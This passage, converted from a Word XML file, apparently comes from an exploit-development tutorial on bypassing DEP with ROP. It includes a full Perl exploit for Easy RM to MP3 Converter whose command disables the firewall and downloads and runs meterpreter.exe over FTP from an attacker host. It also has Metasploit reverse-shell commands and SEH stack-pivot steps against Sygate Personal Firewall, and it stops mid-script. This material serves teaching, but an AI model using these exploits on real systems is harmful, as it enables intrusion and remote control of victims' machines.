        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">pointer to the command </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="707" w:leader="none"/>
        </w:tabs>
        <w:bidi w:val="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">0x00000000 (HIDE) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On XP SP3, WinExec is located at 0x7C86250D</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Take a look at this example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 based exploit for Easy RM to MP3 Converter</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#Uses WinExec()</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#written by corelanc0d3r - http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="D7DF01"/>
        </w:rPr>
        <w:t>//www.corelan.be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$file= "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>rop.m3u</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$buffersize = 26094;</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$junk = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>" x $buffersize;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$eip=pack('V',0x100102DC); #return to stack</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$junk2 = "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>AAAA</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"; #compensate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#WinExec 7C86250D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$evilIP="</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>192.168.0.189</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$rop=pack('V',0x100109EC); #POP EBX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$rop=$rop.pack('V',0xFFFFFFFF);  #&lt;- will be put in EBX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$rop=$rop.pack('V',0x1001C1A5); #INC EBX, EBX = 0 = HIDE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$rop=$rop.pack('V',0x10014F75);  #POP EBP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$rop=$rop.pack('V',0xFFFFFFFF); #return address for WinExec</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$rop=$rop.pack('V',0x10010C31); #POP ESI</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$rop=$rop.pack('V',0x7C86250D); #WinExec()</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$rop=$rop.pack('V',0x1001C07F); #POP EDI</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$rop=$rop.pack('V',0x1001C080); #RET, put in EDI (NOP)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$rop=$rop.pack('V',0x1002CC86); #pushad + ret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$cmd='cmd /c "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>net stop SharedAccess &amp;&amp;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$cmd=$cmd."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">echo user anonymous &gt; ftp.txt &amp;&amp; </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$cmd=$cmd."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">echo anonymous@bla.com &gt;&gt; ftp.txt &amp;&amp; </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$cmd=$cmd."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">echo bin &gt;&gt; ftp.txt &amp;&amp; </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$cmd=$cmd."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">echo get meterpreter.exe &gt;&gt; ftp.txt </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$cmd=$cmd."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&amp; echo quit &gt;&gt; ftp.txt &amp;&amp; </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$cmd=$cmd."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp -n -s:ftp.txt </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".$evilIP."</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; </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$cmd=$cmd.'meterpreter.exe"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>'.</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>"n"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">;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#it's ok to put a null byte, EIP is already overwritten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$payload = $junk.$eip.$junk2.$rop.$cmd;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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload size : </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>".length($payload)."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open($FILE,"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>&gt;$file</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print $FILE $payload;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close($FILE);</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print "</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="7FEC7F"/>
        </w:rPr>
        <w:t>m3u File $file Created successfullyn</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>";</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>First, 0x00000000 is placed into EBX (POP 0xFFFFFFFF into ebx, and then INC EBX is called),  then the registers are set up to do a PUSHAD call (basically I put the return address in EBP, the WinExec() pointer into ESI, and a RET (NOP) into EDI).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>The command above will only work if the firewall service on the XP machine is stopped.  If the PC is not running windows firewall, you may have to remove the "net stop SharedAccess" piece.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>$evilIP is your attacker machine, running an ftp server which contains meterpreter.exe, created using the following metasploit command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./msfpayload windows/meterpreter/reverse_tcp RHOST=192.168.0.189 RPORT=4444 </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 xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>LHOST=192.168.0.189 LPORT=4444 X &gt; meterpreter.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:sz w:val="14"/>
        </w:rPr>
        <w:t>(put everything on one line and copy the file to the FTP server root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On the attacker machine, set up a metasploit multihandler listener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./msfcli multi/handler payload=windows/meterpreter/reverse_tcp </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 xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>lhost=192.168.0.189 lport=4444 E</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Result :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="1704975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="40" name="Image40" descr="">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a:hlinkClick r:id="rId121"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId120"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1704975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>As you can see, even a simple pointer to WinExec will allow you to bypass DEP (works for all cases !) and get you a meterpreter shell.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="24" w:name="ropversionseh"/>
      <w:bookmarkEnd w:id="24"/>
      <w:r>
        <w:rPr/>
        <w:t>SEH Based – The ROP version – WriteProcessMemory()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">In order to demonstrate how SEH based exploits can be turned into a ROP version, I will use an </w:t>
      </w:r>
      <w:hyperlink r:id="rId122" w:tgtFrame="_blank">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>recently published vulnerability</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr/>
        <w:t>, discovered by Lincoln, targeting an ActiveX buffer overflow in Sygate Personal Firewall 5.6.  As we can see in the advisory, the SetRegString() function in sshelper.dll is susceptible to a buffer overflow, which is overwriting the exception handler.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">You can get a copy of the exploit here : </w:t>
      </w:r>
      <w:hyperlink r:id="rId123">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
          </w:rPr>
          <w:t>http://www.exploit-db.com/exploits/13834</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>This function takes 5 arguments.  The 3rd argument is the one that will take you to the buffer overflow :</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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>On IE6 and IE7, the SEH record is overwritten after 3348 bytes. (so 3348 bytes to nseh, and 3352 bytes to seh)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>In a typical (non-ROP) exploit, we would probably end up overwriting nseh with a short jump forward (\xeb\x06\x90\x90) and seh with a pointer to pop/pop/ret.  As explained earlier, this approach is not going to work when DEP is enabled, because we cannot execute code before actually disabling/bypassing DEP first.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>However, there is an easy way to overcome this issue. We just need to pivot back to the stack when the exception handler (the one that we have overwritten) kicks in.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So basically, we don’t really care about nseh (4 bytes), so we’ll create a little script that will overwrite SE Handler after 3352 bytes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>What we are interested in, is seeing how far our buffer (on the stack) is away when the SE Handler gets called. So we will overwrite SE Handler with a valid pointer to an instruction. At this type, just to see where our buffer is, any instruction will do, because we only want to see how far our buffer is away when we jump to that instruction.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="trigger"/>
      <w:bookmarkEnd w:id="25"/>
      <w:r>
        <w:rPr/>
        <w:t>Triggering the bug</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>We’ll put a pointer to RET into SE Handler (we’ll just take one from sshelper.dll for now : 0x0644110C), and then add 25000 more bytes (to trigger the access violation).  Our test exploit script so far will look something like this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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Save the html file to your c: drive and open it in Internet Explorer. Attach Immunity Debugger to iexplore.exe.  Allow the activeX object to run (you may have to click OK twice) and let Immunity catch the exception.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When you observe the SEH chain, you should that we have overwritten the SE Handler with our pointer to RET :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4114800" cy="1371600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="41" name="Image41" descr="">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a:hlinkClick r:id="rId125"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId124"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4114800" cy="1371600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>If you get the SEH chain view like the screenshot above (2 SEH records), press Shift F9 just once. Then you should see the same register / stack view when you would only have seen one SEH record :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2933700" cy="2933700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="42" name="Image42" descr="">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a:hlinkClick r:id="rId127"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId126"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2933700" cy="2933700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Scroll down in the stack view until you see your overwritten SE Handler :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3724275" cy="942975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="43" name="Image43" descr="">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a:hlinkClick r:id="rId129"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId128"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3724275" cy="942975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Set a breakpoint on 0x0644110C and pass the exception to the application (Press Shift F9). The registers now contain this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3162300" cy="1657350"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="44" name="Image44" descr="">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a:hlinkClick r:id="rId131"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId130"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3162300" cy="1657350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>and the top of the stack looks like this :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3200400" cy="1847850"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="45" name="Image45" descr="">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a:hlinkClick r:id="rId133"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId132"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3200400" cy="1847850"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Scroll down until you see the first part of your buffer (A’s) :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2971800" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="46" name="Image46" descr="">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a:hlinkClick r:id="rId135"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId134"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2971800" cy="2305050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:bidi w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="pivot"/>
      <w:bookmarkEnd w:id="26"/>
      <w:r>
        <w:rPr/>
        <w:t>Stack pivoting</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>So, we find our buffer back at ESP (01A6E34C + 1032 bytes).  That means that, if we want to return from the SE Handler to our buffer, we have to pivot the stack with at least 1032 bytes (0x408 or more).  My good friend Lincoln generated his rop file and found a pointer to ADD ESP,46C + RET in sshelper.dll at 0x06471613</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2867025" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="47" name="Image47" descr="">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a:hlinkClick r:id="rId137"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2867025" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>That means that, if we overwrite our SE Handler with a pointer to ADD ESP,46C + RET, then that should make us land back in our controlled buffer and start our rop chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:bidi w:val="0"/>
        <w:spacing w:lineRule="auto" w:line="276" w:before="0" w:after="140"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Modify the script and replace the "seh = …"  line with</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seh = unescape("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
